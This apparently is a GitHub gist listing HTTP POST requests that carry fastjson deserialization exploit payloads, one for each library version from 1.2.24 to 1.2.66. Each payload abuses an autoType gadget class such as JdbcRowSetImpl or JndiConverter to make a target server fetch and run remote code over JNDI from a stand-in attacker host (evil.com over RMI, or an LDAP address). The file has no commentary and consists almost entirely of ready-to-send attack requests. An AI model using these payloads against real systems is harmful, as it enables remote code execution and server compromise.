pikpikcu/fastjson.md

## fastjson.md

      
    Raw
  

              fastjson.md
            
          
    fastjson ver:1.2.24

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

fastjson ver:1.2.41 & ver:1.2.42

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
Content-Length: 160

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://evil.com:9999/TouchFile", "autoCommit":true}

fastjson ver:1.2.43

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
Content-Length: 160

 {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://evil.com:9999/TouchFile", "autoCommit":true}

fastjson ver:1.2.45

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
Content-Length: 160

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://2.2.2.2:88/Object"}}

fastjson ver:1.2.47

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
Content-Length: 160

{
        "a": {
            "@type": "java.lang.Class", 
            "val": "com.sun.rowset.JdbcRowSetImpl"
        }, 
        "b": {
            "@type": "com.sun.rowset.JdbcRowSetImpl", 
            "dataSourceName": "rmi://evil.com:9999/TouchFile", 
            "autoCommit": true
        }
    }

fastjson ver:1.2.62

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
Content-Length: 160

 {"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://evil.com:9999/Exploit"}

fastjson ver:1.2.66

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
Content-Length: 160

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://evil.com:9999/exploit"}